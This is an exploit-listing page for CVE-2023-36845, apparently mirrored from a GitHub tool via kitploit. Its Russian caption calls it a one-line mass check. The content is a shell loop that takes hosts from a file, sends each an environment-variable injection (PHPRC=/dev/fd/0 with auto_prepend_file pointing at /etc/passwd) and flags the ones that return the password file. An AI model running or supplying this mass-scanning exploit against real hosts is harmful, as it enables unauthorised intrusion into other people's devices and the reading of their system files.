Sploitus

Exploit for CVE-2023-36845

kitploit · 2026-08-25

Exploit Code

MARKDOWN9 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SIMROTION13-CVE-2023-36845
# CVE-2023-36845

Массовая проверка одной строкой CVE-2023-36845

root@kitploit:~
    
    
    cat ip.txt| while read host do;do curl -sk "http://$host/?PHPRC=/dev/fd/0" -X POST -d 'auto_prepend_file="/etc/passwd"'| grep -i 'root:' && echo $host "is VULNERABLE";done